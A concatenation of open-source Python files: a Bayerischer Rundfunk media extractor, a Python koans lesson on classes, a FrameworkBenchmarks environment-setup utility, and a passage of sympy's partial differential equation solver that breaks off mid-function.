int_or_none,
parse_duration,
parse_iso8601,
xpath_element,
xpath_text,
)
class BRIE(InfoExtractor):
IE_DESC = 'Bayerischer Rundfunk'
_VALID_URL = r'(?P<base_url>https?://(?:www\.)?br(?:-klassik)?\.de)/(?:[a-z0-9\-_]+/)+(?P<id>[a-z0-9\-_]+)\.html'
_TESTS = [
{
'url': 'http://www.br.de/mediathek/video/sendungen/abendschau/betriebliche-altersvorsorge-104.html',
'md5': '83a0477cf0b8451027eb566d88b51106',
'info_dict': {
'id': '48f656ef-287e-486f-be86-459122db22cc',
'ext': 'mp4',
'title': 'Die böse Überraschung',
'description': 'md5:ce9ac81b466ce775b8018f6801b48ac9',
'duration': 180,
'uploader': 'Reinhard Weber',
'upload_date': '20150422',
},
'skip': '404 not found',
},
{
'url': 'http://www.br.de/nachrichten/oberbayern/inhalt/muenchner-polizeipraesident-schreiber-gestorben-100.html',
'md5': 'af3a3a4aa43ff0ce6a89504c67f427ef',
'info_dict': {
'id': 'a4b83e34-123d-4b81-9f4e-c0d3121a4e05',
'ext': 'flv',
'title': 'Manfred Schreiber ist tot',
'description': 'md5:b454d867f2a9fc524ebe88c3f5092d97',
'duration': 26,
},
'skip': '404 not found',
},
{
'url': 'https://www.br-klassik.de/audio/peeping-tom-premierenkritik-dance-festival-muenchen-100.html',
'md5': '8b5b27c0b090f3b35eac4ab3f7a73d3d',
'info_dict': {
'id': '74c603c9-26d3-48bb-b85b-079aeed66e0b',
'ext': 'aac',
'title': 'Kurzweilig und sehr bewegend',
'description': 'md5:0351996e3283d64adeb38ede91fac54e',
'duration': 296,
},
'skip': '404 not found',
},
{
'url': 'http://www.br.de/radio/bayern1/service/team/videos/team-video-erdelt100.html',
'md5': 'dbab0aef2e047060ea7a21fc1ce1078a',
'info_dict': {
'id': '6ba73750-d405-45d3-861d-1ce8c524e059',
'ext': 'mp4',
'title': 'Umweltbewusster Häuslebauer',
'description': 'md5:d52dae9792d00226348c1dbb13c9bae2',
'duration': 116,
}
},
{
'url': 'http://www.br.de/fernsehen/br-alpha/sendungen/kant-fuer-anfaenger/kritik-der-reinen-vernunft/kant-kritik-01-metaphysik100.html',
'md5': '23bca295f1650d698f94fc570977dae3',
'info_dict': {
'id': 'd982c9ce-8648-4753-b358-98abb8aec43d',
'ext': 'mp4',
'title': 'Folge 1 - Metaphysik',
'description': 'md5:bb659990e9e59905c3d41e369db1fbe3',
'duration': 893,
'uploader': 'Eva Maria Steimle',
'upload_date': '20170208',
}
},
]
def _real_extract(self, url):
base_url, display_id = re.search(self._VALID_URL, url).groups()
page = self._download_webpage(url, display_id)
xml_url = self._search_regex(
r"return BRavFramework\.register\(BRavFramework\('avPlayer_(?:[a-f0-9-]{36})'\)\.setup\({dataURL:'(/(?:[a-z0-9\-]+/)+[a-z0-9/~_.-]+)'}\)\);", page, 'XMLURL')
xml = self._download_xml(base_url + xml_url, display_id)
medias = []
for xml_media in xml.findall('video') + xml.findall('audio'):
media_id = xml_media.get('externalId')
media = {
'id': media_id,
'title': xpath_text(xml_media, 'title', 'title', True),
'duration': parse_duration(xpath_text(xml_media, 'duration')),
'formats': self._extract_formats(xpath_element(
xml_media, 'assets'), media_id),
'thumbnails': self._extract_thumbnails(xpath_element(
xml_media, 'teaserImage/variants'), base_url),
'description': xpath_text(xml_media, 'desc'),
'webpage_url': xpath_text(xml_media, 'permalink'),
'uploader': xpath_text(xml_media, 'author'),
}
broadcast_date = xpath_text(xml_media, 'broadcastDate')
if broadcast_date:
media['upload_date'] = ''.join(reversed(broadcast_date.split('.')))
medias.append(media)
if len(medias) > 1:
self._downloader.report_warning(
'found multiple medias; please '
'report this with the video URL to http://yt-dl.org/bug')
if not medias:
raise ExtractorError('No media entries found')
return medias[0]
def _extract_formats(self, assets, media_id):
formats = []
for asset in assets.findall('asset'):
format_url = xpath_text(asset, ['downloadUrl', 'url'])
asset_type = asset.get('type')
if asset_type.startswith('HDS'):
formats.extend(self._extract_f4m_formats(
format_url + '?hdcore=3.2.0', media_id, f4m_id='hds', fatal=False))
elif asset_type.startswith('HLS'):
formats.extend(self._extract_m3u8_formats(
format_url, media_id, 'mp4', 'm3u8_native', m3u8_id='hds', fatal=False))
else:
format_info = {
'ext': xpath_text(asset, 'mediaType'),
'width': int_or_none(xpath_text(asset, 'frameWidth')),
'height': int_or_none(xpath_text(asset, 'frameHeight')),
'tbr': int_or_none(xpath_text(asset, 'bitrateVideo')),
'abr': int_or_none(xpath_text(asset, 'bitrateAudio')),
'vcodec': xpath_text(asset, 'codecVideo'),
'acodec': xpath_text(asset, 'codecAudio'),
'container': xpath_text(asset, 'mediaType'),
'filesize': int_or_none(xpath_text(asset, 'size')),
}
format_url = self._proto_relative_url(format_url)
if format_url:
http_format_info = format_info.copy()
http_format_info.update({
'url': format_url,
'format_id': 'http-%s' % asset_type,
})
formats.append(http_format_info)
server_prefix = xpath_text(asset, 'serverPrefix')
if server_prefix:
rtmp_format_info = format_info.copy()
rtmp_format_info.update({
'url': server_prefix,
'play_path': xpath_text(asset, 'fileName'),
'format_id': 'rtmp-%s' % asset_type,
})
formats.append(rtmp_format_info)
self._sort_formats(formats)
return formats
def _extract_thumbnails(self, variants, base_url):
thumbnails = [{
'url': base_url + xpath_text(variant, 'url'),
'width': int_or_none(xpath_text(variant, 'width')),
'height': int_or_none(xpath_text(variant, 'height')),
} for variant in variants.findall('variant') if xpath_text(variant, 'url')]
thumbnails.sort(key=lambda x: x['width'] * x['height'], reverse=True)
return thumbnails
class BRMediathekIE(InfoExtractor):
IE_DESC = 'Bayerischer Rundfunk Mediathek'
_VALID_URL = r'https?://(?:www\.)?br\.de/mediathek/video/[^/?&#]*?-(?P<id>av:[0-9a-f]{24})'
_TESTS = [{
'url': 'https://www.br.de/mediathek/video/gesundheit-die-sendung-vom-28112017-av:5a1e6a6e8fce6d001871cc8e',
'md5': 'fdc3d485835966d1622587d08ba632ec',
'info_dict': {
'id': 'av:5a1e6a6e8fce6d001871cc8e',
'ext': 'mp4',
'title': 'Die Sendung vom 28.11.2017',
'description': 'md5:6000cdca5912ab2277e5b7339f201ccc',
'timestamp': 1511942766,
'upload_date': '20171129',
}
}]
def _real_extract(self, url):
clip_id = self._match_id(url)
clip = self._download_json(
'https://proxy-base.master.mango.express/graphql',
clip_id, data=json.dumps({
"query": """{
viewer {
clip(id: "%s") {
title
description
duration
createdAt
ageRestriction
videoFiles {
edges {
node {
publicLocation
fileSize
videoProfile {
width
height
bitrate
encoding
}
}
}
}
captionFiles {
edges {
node {
publicLocation
}
}
}
teaserImages {
edges {
node {
imageFiles {
edges {
node {
publicLocation
width
height
}
}
}
}
}
}
}
}
}""" % clip_id}).encode(), headers={
'Content-Type': 'application/json',
})['data']['viewer']['clip']
title = clip['title']
formats = []
for edge in clip.get('videoFiles', {}).get('edges', []):
node = edge.get('node', {})
n_url = node.get('publicLocation')
if not n_url:
continue
ext = determine_ext(n_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
n_url, clip_id, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
else:
video_profile = node.get('videoProfile', {})
tbr = int_or_none(video_profile.get('bitrate'))
format_id = 'http'
if tbr:
format_id += '-%d' % tbr
formats.append({
'format_id': format_id,
'url': n_url,
'width': int_or_none(video_profile.get('width')),
'height': int_or_none(video_profile.get('height')),
'tbr': tbr,
'filesize': int_or_none(node.get('fileSize')),
})
self._sort_formats(formats)
subtitles = {}
for edge in clip.get('captionFiles', {}).get('edges', []):
node = edge.get('node', {})
n_url = node.get('publicLocation')
if not n_url:
continue
subtitles.setdefault('de', []).append({
'url': n_url,
})
thumbnails = []
for edge in clip.get('teaserImages', {}).get('edges', []):
for image_edge in edge.get('node', {}).get('imageFiles', {}).get('edges', []):
node = image_edge.get('node', {})
n_url = node.get('publicLocation')
if not n_url:
continue
thumbnails.append({
'url': n_url,
'width': int_or_none(node.get('width')),
'height': int_or_none(node.get('height')),
})
return {
'id': clip_id,
'title': title,
'description': clip.get('description'),
'duration': int_or_none(clip.get('duration')),
'timestamp': parse_iso8601(clip.get('createdAt')),
'age_limit': int_or_none(clip.get('ageRestriction')),
'formats': formats,
'subtitles': subtitles,
'thumbnails': thumbnails,
}
| unlicense |
apradhn/python_koans | python3/koans/about_classes.py | 68 | 4778 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutClasses(Koan):
class Dog:
"Dogs need regular walkies. Never, ever let them drive."
def test_instances_of_classes_can_be_created_adding_parentheses(self):
# NOTE: The .__name__ attribute will convert the class
# into a string value.
fido = self.Dog()
self.assertEqual(__, fido.__class__.__name__)
def test_classes_have_docstrings(self):
self.assertRegexpMatches(self.Dog.__doc__, __)
# ------------------------------------------------------------------
class Dog2:
def __init__(self):
self._name = 'Paul'
def set_name(self, a_name):
self._name = a_name
def test_init_method_is_the_constructor(self):
dog = self.Dog2()
self.assertEqual(__, dog._name)
def test_private_attributes_are_not_really_private(self):
dog = self.Dog2()
dog.set_name("Fido")
self.assertEqual(__, dog._name)
# The _ prefix in _name implies private ownership, but nothing is truly
# private in Python.
def test_you_can_also_access_the_value_out_using_getattr_and_dict(self):
fido = self.Dog2()
fido.set_name("Fido")
self.assertEqual(__, getattr(fido, "_name"))
# getattr(), setattr() and delattr() are a way of accessing attributes
# by method rather than through assignment operators
self.assertEqual(__, fido.__dict__["_name"])
# Yes, this works here, but don't rely on the __dict__ object! Some
# class implementations use optimization which result in __dict__ not
# showing everything.
# ------------------------------------------------------------------
class Dog3:
def __init__(self):
self._name = None
def set_name(self, a_name):
self._name = a_name
def get_name(self):
return self._name
name = property(get_name, set_name)
def test_that_name_can_be_read_as_a_property(self):
fido = self.Dog3()
fido.set_name("Fido")
# access as method
self.assertEqual(__, fido.get_name())
# access as property
self.assertEqual(__, fido.name)
# ------------------------------------------------------------------
class Dog4:
def __init__(self):
self._name = None
@property
def name(self):
return self._name
@name.setter
def name(self, a_name):
self._name = a_name
def test_creating_properties_with_decorators_is_slightly_easier(self):
fido = self.Dog4()
fido.name = "Fido"
self.assertEqual(__, fido.name)
# ------------------------------------------------------------------
class Dog5:
def __init__(self, initial_name):
self._name = initial_name
@property
def name(self):
return self._name
def test_init_provides_initial_values_for_instance_variables(self):
fido = self.Dog5("Fido")
self.assertEqual(__, fido.name)
def test_args_must_match_init(self):
with self.assertRaises(___):
self.Dog5()
# THINK ABOUT IT:
# Why is this so?
def test_different_objects_have_different_instance_variables(self):
fido = self.Dog5("Fido")
rover = self.Dog5("Rover")
self.assertEqual(__, rover.name == fido.name)
# ------------------------------------------------------------------
class Dog6:
def __init__(self, initial_name):
self._name = initial_name
def get_self(self):
return self
def __str__(self):
#
# Implement this!
#
return __
def __repr__(self):
return "<Dog named '" + self._name + "'>"
def test_inside_a_method_self_refers_to_the_containing_object(self):
fido = self.Dog6("Fido")
self.assertEqual(__, fido.get_self()) # Not a string!
def test_str_provides_a_string_version_of_the_object(self):
fido = self.Dog6("Fido")
self.assertEqual("Fido", str(fido))
def test_str_is_used_explicitly_in_string_interpolation(self):
fido = self.Dog6("Fido")
self.assertEqual(__, "My dog is " + str(fido))
def test_repr_provides_a_more_complete_string_version(self):
fido = self.Dog6("Fido")
self.assertEqual(__, repr(fido))
def test_all_objects_support_str_and_repr(self):
seq = [1, 2, 3]
self.assertEqual(__, str(seq))
self.assertEqual(__, repr(seq))
self.assertEqual(__, str("STRING"))
self.assertEqual(__, repr("STRING"))
| mit |
kostya-sh/FrameworkBenchmarks | toolset/setup/linux/setup_util.py | 40 | 5611 | import re
import os
import sys
import subprocess
import platform
from threading import Thread
from Queue import Queue, Empty
class NonBlockingStreamReader:
    '''
    Enables calling readline in a non-blocking manner with a blocking stream,
    such as the ones returned from subprocess.Popen

    Originally written by Eyal Arubas, who granted permission to use this inside TFB
    See http://eyalarubas.com/python-subproc-nonblock.html
    '''
    def __init__(self, stream, eof_message = None):
        '''
        stream: the stream to read from.
                Usually a process' stdout or stderr.
        eof_message: A message to print to stdout as soon
                as the stream's end is reached. Useful if you
                want to track the exact moment a stream terminates
        '''
        self._s = stream
        self._q = Queue()
        self._eof_message = eof_message
        # Sentinel queued at EOF so readline() can tell "no data yet"
        # apart from "stream closed".
        self._poisonpill = 'MAGIC_POISONPILL_STRING'

        def _populateQueue(stream, queue):
            # Runs on a daemon thread: blockingly read lines and hand
            # them to the queue until the stream reports EOF.
            while True:
                line = stream.readline()
                if line: # 'data\n' or '\n'
                    queue.put(line)
                else: # '' e.g. EOF
                    if self._eof_message:
                        sys.stdout.write(self._eof_message + '\n')
                    queue.put(self._poisonpill)
                    return

        # Daemon thread so a still-open stream never blocks interpreter exit.
        self._t = Thread(target = _populateQueue,
                args = (self._s, self._q))
        self._t.daemon = True
        self._t.start()

    def readline(self, timeout = None):
        # With timeout=None this polls (block=False) and returns None
        # immediately when no line is buffered; otherwise it waits up to
        # `timeout` seconds.  Raises EndOfStream once the sentinel arrives.
        try:
            line = self._q.get(block = timeout is not None,
                    timeout = timeout)
            if line == self._poisonpill:
                raise EndOfStream
            return line
        except Empty:
            return None
class EndOfStream(Exception):
    """Raised by NonBlockingStreamReader.readline once the wrapped
    stream has been fully consumed."""
# Replaces all text found using the regular expression to_replace with the supplied replacement.
def replace_text(file, to_replace, replacement):
    """Rewrite `file` in place, substituting every regex match of
    `to_replace` with `replacement`."""
    with open(file, "r") as source:
        updated = re.sub(to_replace, replacement, source.read())
    with open(file, "w") as target:
        target.write(updated)
# Replaces the current process environment with the one found in
# config file. Retains a few original vars (HOME,PATH, etc) by default.
# Optionally allows specification of a command to be run before loading
# the environment, to allow the framework to set environment variables
# Note: This command *cannot* print to stdout!
#
# Note: This will not replace the sudo environment (e.g. subprocess.check_call("sudo <command>")).
# If you must use sudo, consider sudo sh -c ". <config> && your_command"
def replace_environ(config=None, root=None, print_result=False, command='true'):
    # NOTE(review): Python 2 module (print statements below); keep it so.
    if platform.system().lower() == 'windows':
        pass
    else:
        # Clean up our current environment, preserving some important items
        mini_environ = {}
        for envname in ['HOME', 'PATH', 'LANG', 'USER', 'LD_LIBRARY_PATH', 'PYTHONPATH', 'FWROOT', 'TRAVIS']:
            if envname in os.environ:
                mini_environ[envname] = os.environ[envname]
        for key in os.environ:
            if key.startswith(('TFB_', 'TRAVIS_')): # Any TFB_* and TRAVIS_* variables are preserved
                mini_environ[key] = os.environ[key]
        os.environ.clear()
        # Use FWROOT if explicitely provided
        if root is not None:
            mini_environ['FWROOT']=root

        # Run command, source config file, and store resulting environment
        setup_env = "%s && . %s && env" % (command, config)
        env = ""
        try:
            # The minimal environment is used so the sourced config starts
            # from a clean slate rather than inheriting stale variables.
            env = subprocess.check_output(setup_env, shell=True, env=mini_environ,
                executable='/bin/bash')
        except subprocess.CalledProcessError:
            # Ensure that an error here does not crash the toolset
            print "CRITICAL: Loading %s returned non-zero exit" % config
            # Fall back to restoring the preserved minimal environment.
            for key,value in mini_environ.iteritems():
                os.environ[key]=value
            return
        # Parse `env` output line by line back into os.environ.
        for line in env.split('\n'):
            try:
                key, value = line.split('=', 1)
                # If we already have this TFB_ variable, do not overwrite
                if key.startswith('TFB_') and key in mini_environ:
                    os.environ[key]=mini_environ[key]
                else:
                    os.environ[key]=value
            except Exception:
                if not line: # Don't warn for empty line
                    continue
                print "WARN: Line '%s' from '%s' is not an environment variable" % (line, config)
                continue
        if print_result:
            out = subprocess.check_output('env', shell=True, executable='/bin/bash')
            print "Environment after loading %s" %config
            print out
# Queries the shell for the value of FWROOT
def get_fwroot():
  """Return the FrameworkBenchmarks root directory (FWROOT).

  On Windows a hard-coded default location is returned.  Elsewhere the
  FWROOT environment variable is read through a bash subshell; if that
  fails, the current working directory is returned as a best guess.
  """
  if platform.system().lower() == 'windows':
    # Raw string: the old plain literal relied on '\F' being an invalid
    # escape sequence that happened to pass through unchanged (a
    # DeprecationWarning/SyntaxWarning on modern Pythons).
    return r"C:\FrameworkBenchmarks"
  try:
    # Use printf to avoid getting a newline
    # Redirect to avoid stderr printing
    return subprocess.check_output('printf $FWROOT 2> /dev/null',
                                   shell=True, executable='/bin/bash')
  except subprocess.CalledProcessError:
    # Make a last-guess effort ;-)
    return os.getcwd()
# Turns absolute path into path relative to FWROOT
# Assumes path is underneath FWROOT, not above
#
# Useful for clean presentation of paths
# e.g. /foo/bar/benchmarks/go/install.sh
# v.s. FWROOT/go/install.sh
def path_relative_to_root(path):
  """Return `path` with the FWROOT prefix stripped.

  Assumes `path` lies underneath FWROOT, not above it.  Useful for clean
  presentation of paths, e.g. showing FWROOT/go/install.sh instead of
  /foo/bar/benchmarks/go/install.sh.
  """
  # Bash parameter expansion ${D#prefix} removes the prefix; printf avoids
  # appending a trailing newline to the result.
  fwroot = get_fwroot()
  expansion = "D=%s && printf \"${D#%s}\""%(path, fwroot)
  return subprocess.check_output(expansion, shell=True, executable='/bin/bash')
| bsd-3-clause |
madan96/sympy | sympy/solvers/pde.py | 13 | 35505 | """
This module contains pdsolve() and different helper functions that it
uses. It is heavily inspired by the ode module and hence the basic
infrastructure remains the same.
**Functions in this module**
These are the user functions in this module:
- pdsolve() - Solves PDE's
    - classify_pde() - Classifies PDEs into possible hints for pdsolve().
- pde_separate() - Separate variables in partial differential equation either by
additive or multiplicative separation approach.
These are the helper functions in this module:
- pde_separate_add() - Helper function for searching additive separable solutions.
- pde_separate_mul() - Helper function for searching multiplicative
separable solutions.
**Currently implemented solver methods**
The following methods are implemented for solving partial differential
equations. See the docstrings of the various pde_hint() functions for
more information on each (run help(pde)):
- 1st order linear homogeneous partial differential equations
with constant coefficients.
- 1st order linear general partial differential equations
with constant coefficients.
- 1st order linear partial differential equations with
variable coefficients.
"""
from __future__ import print_function, division
from itertools import combinations_with_replacement
from sympy.simplify import simplify
from sympy.core import Add, S
from sympy.core.compatibility import (reduce, is_sequence, range)
from sympy.core.function import Function, expand, AppliedUndef, Subs
from sympy.core.relational import Equality, Eq
from sympy.core.symbol import Symbol, Wild, symbols
from sympy.functions import exp
from sympy.integrals.integrals import Integral
from sympy.utilities.iterables import has_dups
from sympy.utilities.misc import filldedent
from sympy.solvers.deutils import _preprocess, ode_order, _desolve
from sympy.solvers.solvers import solve
from sympy.simplify.radsimp import collect
import operator
# Every hint classify_pde() can emit, in priority order: when choosing the
# 'default' hint, the first entry of this tuple that matched wins.
allhints = (
    "1st_linear_constant_coeff_homogeneous",
    "1st_linear_constant_coeff",
    "1st_linear_constant_coeff_Integral",
    "1st_linear_variable_coeff"
    )
def pdsolve(eq, func=None, hint='default', dict=False, solvefun=None, **kwargs):
    """
    Solves any (supported) kind of partial differential equation.

    **Usage**

        pdsolve(eq, f(x,y), hint) -> Solve partial differential equation
        eq for function f(x,y), using method hint.

    **Details**

    ``eq`` is the PDE, given either as an Equality or as an expression
    assumed equal to 0.  ``func`` is the unknown function ``f(x, y)``;
    when omitted it is autodetected.  ``hint`` selects the solving
    method -- use classify_pde(eq, f(x,y)) to list the possibilities.
    ``solvefun`` names the arbitrary function appearing in the solution
    (default ``F``).

    Meta-hints:

    "default":
        Use whatever hint is returned first by classify_pde().

    "all":
        Try every matching hint and return a dictionary of
        hint:solution terms.  A hint that raises NotImplementedError
        maps to the exception object instead.  The dictionary also
        carries the special keys 'order' (the PDE order) and 'default'
        (the solution the default hint would produce).

    "all_Integral":
        Same as "all", except when a hint also has a corresponding
        "_Integral" variant, only the "_Integral" one is used.  Useful
        when "all" hangs on a difficult or impossible integral.

    Note that pdsolve always returns an Equality (except for "all" /
    "all_Integral"); an explicit solution for f(x, y) is not possible
    as it is for ODEs.

    Examples
    ========
    >>> from sympy.solvers.pde import pdsolve
    >>> from sympy import Function, Eq
    >>> from sympy.abc import x, y
    >>> f = Function('f')
    >>> u = f(x, y)
    >>> eq = Eq(1 + (2*(u.diff(x)/u)) + (3*(u.diff(y)/u)))
    >>> pdsolve(eq)
    Eq(f(x, y), F(3*x - 2*y)*exp(-2*x/13 - 3*y/13))
    """
    given_hint = hint  # hint exactly as the caller supplied it
    if not solvefun:
        solvefun = Function('F')
    # _desolve performs classification; see its docstring for details.
    hints = _desolve(eq, func=func,
                     hint=hint, simplify=True, type='pde', **kwargs)
    eq = hints.pop('eq', False)
    all_ = hints.pop('all', False)
    if not all_:
        # Single-hint path: solve with the selected hint, return one Eq.
        chosen = hints['hint']
        return _helper_simplify(eq, chosen, hints['func'],
                                hints['order'], hints[chosen], solvefun)
    # 'all' meta-hint: try every matching hint and collect the results.
    # TODO : 'best' hint should be implemented when adequate
    # number of hints are added.
    solutions = {}
    failures = {}
    gethints = classify_pde(eq, dict=True)
    solutions['order'] = gethints['order']
    solutions['default'] = gethints['default']
    for hint in hints:
        try:
            rv = _helper_simplify(eq, hint, hints[hint]['func'],
                                  hints[hint]['order'], hints[hint][hint],
                                  solvefun)
        except NotImplementedError as detail:
            failures[hint] = detail
        else:
            solutions[hint] = rv
    solutions.update(failures)
    return solutions
def _helper_simplify(eq, hint, func, order, match, solvefun):
    """Dispatch to the concrete pde_<hint> solver and post-process.

    Looks up the solver by name in this module's globals (a trailing
    "_Integral" suffix is stripped, since both variants share one
    implementation), invokes it, and hands the raw result to
    _handle_Integral.  Centralising the dispatch here lets pdsolve
    avoid calling _desolve more than once.
    """
    suffix = "_Integral"
    base = hint[:-len(suffix)] if hint.endswith(suffix) else hint
    solver = globals()["pde_" + base]
    raw = solver(eq, func, order, match, solvefun)
    return _handle_Integral(raw, func, order, hint)
def _handle_Integral(expr, func, order, hint):
    r"""
    Converts a solution with integrals in it into an actual solution.

    Only the "1st_linear_constant_coeff" hint evaluates its integrals
    (via doit(), then simplify); any "_Integral" hint deliberately
    returns the unevaluated form, and every other hint passes through
    untouched.
    """
    if hint.endswith("_Integral"):
        # Caller explicitly asked for the unevaluated Integral form.
        return expr
    if hint == "1st_linear_constant_coeff":
        return simplify(expr.doit())
    return expr
def classify_pde(eq, func=None, dict=False, **kwargs):
    """
    Returns a tuple of possible pdsolve() classifications for a PDE.
    The tuple is ordered so that first item is the classification that
    pdsolve() uses to solve the PDE by default. In general,
    classifications near the beginning of the list will produce
    better solutions faster than those near the end, though there are
    always exceptions. To make pdsolve use a different classification,
    use pdsolve(PDE, func, hint=<classification>). See also the pdsolve()
    docstring for different meta-hints you can use.
    If ``dict`` is true, classify_pde() will return a dictionary of
    hint:match expression terms. This is intended for internal use by
    pdsolve(). Note that because dictionaries are ordered arbitrarily,
    this will most likely not be in the same order as the tuple.
    You can get help on different hints by doing help(pde.pde_hintname),
    where hintname is the name of the hint without "_Integral".
    See sympy.pde.allhints or the sympy.pde docstring for a list of all
    supported hints that can be returned from classify_pde.
    Examples
    ========
    >>> from sympy.solvers.pde import classify_pde
    >>> from sympy import Function, diff, Eq
    >>> from sympy.abc import x, y
    >>> f = Function('f')
    >>> u = f(x, y)
    >>> ux = u.diff(x)
    >>> uy = u.diff(y)
    >>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)))
    >>> classify_pde(eq)
    ('1st_linear_constant_coeff_homogeneous',)
    """
    # 'prep' (internal kwarg) says whether eq still needs preprocessing /
    # function autodetection via _preprocess.
    prep = kwargs.pop('prep', True)
    if func and len(func.args) != 2:
        raise NotImplementedError("Right now only partial "
            "differential equations of two variables are supported")
    if prep or func is None:
        prep, func_ = _preprocess(eq, func)
        if func is None:
            func = func_
    # Normalise an Equality into a single expression equal to zero.
    if isinstance(eq, Equality):
        if eq.rhs != 0:
            return classify_pde(eq.lhs - eq.rhs, func)
        eq = eq.lhs
    f = func.func
    x = func.args[0]
    y = func.args[1]
    fx = f(x,y).diff(x)
    fy = f(x,y).diff(y)
    # TODO : For now pde.py uses support offered by the ode_order function
    # to find the order with respect to a multi-variable function. An
    # improvement could be to classify the order of the PDE on the basis of
    # individual variables.
    order = ode_order(eq, f(x,y))
    # hint:matchdict or hint:(tuple of matchdicts)
    # Also will contain "default":<default hint> and "order":order items.
    matching_hints = {'order': order}
    if not order:
        # No derivatives of f present: nothing to classify.
        if dict:
            matching_hints["default"] = None
            return matching_hints
        else:
            return ()
    eq = expand(eq)
    # Wildcards for matching the linear form b*fx + c*fy + d*f + e;
    # b, c, d exclude x and y so a match implies constant coefficients.
    a = Wild('a', exclude = [f(x,y)])
    b = Wild('b', exclude = [f(x,y), fx, fy, x, y])
    c = Wild('c', exclude = [f(x,y), fx, fy, x, y])
    d = Wild('d', exclude = [f(x,y), fx, fy, x, y])
    e = Wild('e', exclude = [f(x,y), fx, fy])
    n = Wild('n', exclude = [x, y])
    # Try removing the smallest power of f(x,y)
    # from the highest partial derivatives of f(x,y)
    reduced_eq = None
    if eq.is_Add:
        # Every order-'order' mixed partial of f(x, y).
        var = set(combinations_with_replacement((x,y), order))
        dummyvar = var.copy()
        power = None
        # First pass: find some derivative whose coefficient is a*f**n.
        for i in var:
            coeff = eq.coeff(f(x,y).diff(*i))
            if coeff != 1:
                match = coeff.match(a*f(x,y)**n)
                if match and match[a]:
                    power = match[n]
                    dummyvar.remove(i)
                    break
            dummyvar.remove(i)
        # Second pass: keep the smallest such power across the rest.
        for i in dummyvar:
            coeff = eq.coeff(f(x,y).diff(*i))
            if coeff != 1:
                match = coeff.match(a*f(x,y)**n)
                if match and match[a] and match[n] < power:
                    power = match[n]
        if power:
            den = f(x,y)**power
            reduced_eq = Add(*[arg/den for arg in eq.args])
    if not reduced_eq:
        reduced_eq = eq
    if order == 1:
        reduced_eq = collect(reduced_eq, f(x, y))
        r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
        if r:
            if not r[e]:
                ## Linear first-order homogeneous partial-differential
                ## equation with constant coefficients
                r.update({'b': b, 'c': c, 'd': d})
                matching_hints["1st_linear_constant_coeff_homogeneous"] = r
            else:
                if r[b]**2 + r[c]**2 != 0:
                    ## Linear first-order general partial-differential
                    ## equation with constant coefficients
                    r.update({'b': b, 'c': c, 'd': d, 'e': e})
                    matching_hints["1st_linear_constant_coeff"] = r
                    matching_hints[
                        "1st_linear_constant_coeff_Integral"] = r
        else:
            # Retry with wildcards that allow x and y in the coefficients,
            # i.e. the variable-coefficient linear form.
            b = Wild('b', exclude=[f(x, y), fx, fy])
            c = Wild('c', exclude=[f(x, y), fx, fy])
            d = Wild('d', exclude=[f(x, y), fx, fy])
            r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
            if r:
                r.update({'b': b, 'c': c, 'd': d, 'e': e})
                matching_hints["1st_linear_variable_coeff"] = r
    # Order keys based on allhints.
    retlist = []
    for i in allhints:
        if i in matching_hints:
            retlist.append(i)
    if dict:
        # Dictionaries are ordered arbitrarily, so make note of which
        # hint would come first for pdsolve(). Use an ordered dict in Py 3.
        matching_hints["default"] = None
        matching_hints["ordered_hints"] = tuple(retlist)
        for i in allhints:
            if i in matching_hints:
                matching_hints["default"] = i
                break
        return matching_hints
    else:
        return tuple(retlist)
def checkpdesol(pde, sol, func=None, solve_for_func=True):
    """
    Checks if the given solution satisfies the partial differential
    equation.
    pde is the partial differential equation which can be given in the
    form of an equation or an expression. sol is the solution for which
    the pde is to be checked. This can also be given in an equation or
    an expression form. If the function is not provided, the helper
    function _preprocess from deutils is used to identify the function.
    If a sequence of solutions is passed, the same sort of container will be
    used to return the result for each solution.
    The following methods are currently being implemented to check if the
    solution satisfies the PDE:
        1. Directly substitute the solution in the PDE and check. If the
        solution hasn't been solved for f, then it will solve for f
        provided solve_for_func hasn't been set to False.
    If the solution satisfies the PDE, then a tuple (True, 0) is returned.
    Otherwise a tuple (False, expr) where expr is the value obtained
    after substituting the solution in the PDE. However if a known solution
    returns False, it may be due to the inability of doit() to simplify it to zero.
    Examples
    ========
    >>> from sympy import Function, symbols, diff
    >>> from sympy.solvers.pde import checkpdesol, pdsolve
    >>> x, y = symbols('x y')
    >>> f = Function('f')
    >>> eq = 2*f(x,y) + 3*f(x,y).diff(x) + 4*f(x,y).diff(y)
    >>> sol = pdsolve(eq)
    >>> assert checkpdesol(eq, sol)[0]
    >>> eq = x*f(x,y) + f(x,y).diff(x)
    >>> checkpdesol(eq, sol)
    (False, (x*F(4*x - 3*y) - 6*F(4*x - 3*y)/25 + 4*Subs(Derivative(F(_xi_1), _xi_1), (_xi_1,), (4*x - 3*y,)))*exp(-6*x/25 - 8*y/25))
    """
    # Converting the pde into an equation
    if not isinstance(pde, Equality):
        pde = Eq(pde, 0)
    # If no function is given, try finding the function present.
    if func is None:
        try:
            _, func = _preprocess(pde.lhs)
        except ValueError:
            funcs = [s.atoms(AppliedUndef) for s in (
                sol if is_sequence(sol, set) else [sol])]
            # BUG FIX: unpack the list of per-solution sets.  Passing the
            # list itself made union() try to insert the (unhashable) sets
            # as elements, raising TypeError instead of collecting the
            # applied functions.
            funcs = set().union(*funcs)
            if len(funcs) != 1:
                raise ValueError(
                    'must pass func arg to checkpdesol for this case.')
            func = funcs.pop()
    # If the given solution is in the form of a list or a set
    # then return a list or set of tuples.
    if is_sequence(sol, set):
        return type(sol)([checkpdesol(
            pde, i, func=func,
            solve_for_func=solve_for_func) for i in sol])
    # Convert solution into an equation
    if not isinstance(sol, Equality):
        sol = Eq(func, sol)
    elif sol.rhs == func:
        sol = sol.reversed
    # Try solving for the function
    solved = sol.lhs == func and not sol.rhs.has(func)
    if solve_for_func and not solved:
        solved = solve(sol, func)
        if solved:
            # Re-check each explicit solution with solve_for_func disabled
            # to avoid recursing forever.
            if len(solved) == 1:
                return checkpdesol(pde, Eq(func, solved[0]),
                    func=func, solve_for_func=False)
            else:
                return checkpdesol(pde, [Eq(func, t) for t in solved],
                    func=func, solve_for_func=False)
    # try direct substitution of the solution into the PDE and simplify
    if sol.lhs == func:
        pde = pde.lhs - pde.rhs
        s = simplify(pde.subs(func, sol.rhs).doit())
